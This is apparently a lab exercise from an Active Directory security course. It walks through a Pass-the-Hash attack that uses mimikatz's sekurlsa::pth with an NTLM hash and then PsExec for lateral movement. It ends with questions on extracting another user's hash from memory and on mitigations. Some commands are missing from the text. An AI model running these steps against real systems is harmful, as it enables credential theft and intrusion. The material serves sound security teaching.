You can find all tools needed in the ""-file. The links below are for your own reference.
Tools needed:
- Mimikatz:
- PSExec:
In this exercise, we'll execute a Pass-the-Hash attack through the local Administrator account. Remember (see Lab Setup Guide) that we set the same local admin password on adsec-00 as well as on adsec-01. Therefore the NTLM hashes are the same on both computers.
Open a command prompt with admin rights (right-click "Run as Administrator") and start mimikatz.
cd C:\attacker-tools
Run the following commands inside mimikatz to extract the password hashes of the local user accounts.
Next, we use the PTH-function in mimikatz to start a shell with the hash of the local admin account (RID 500).
sekurlsa::pth /user:Administrator /ntlm:7dfa0531d73101ca080c7379a9bff1c7 /domain:doesnotmatter
Finally, connect to adsec-01 using psexec.
cd C:\attacker-tools
.\PsExec64.exe \\adsec-01 cmd
Make sure everything worked as expected
- What is the purpose of the mimikatz commands "privilege::debug" and "token::elevate"? Why do you need to execute them?
- Log on to adsec-01 as Bruce Lee. Use what you learned above and help john to remotely extract Bruce Lees NTLM hash from memory.
"lsadump::sam" only dumps the local password database. You need to use a different command to extract data from memory. - Research on the internet on how to best mitigate pass-the-hash attacks. Describe the mitigation techniques that you think are the best and explain why you chose them.
- Is it possible (and feasible) to just disable NTLM at all? Explain your reasoning.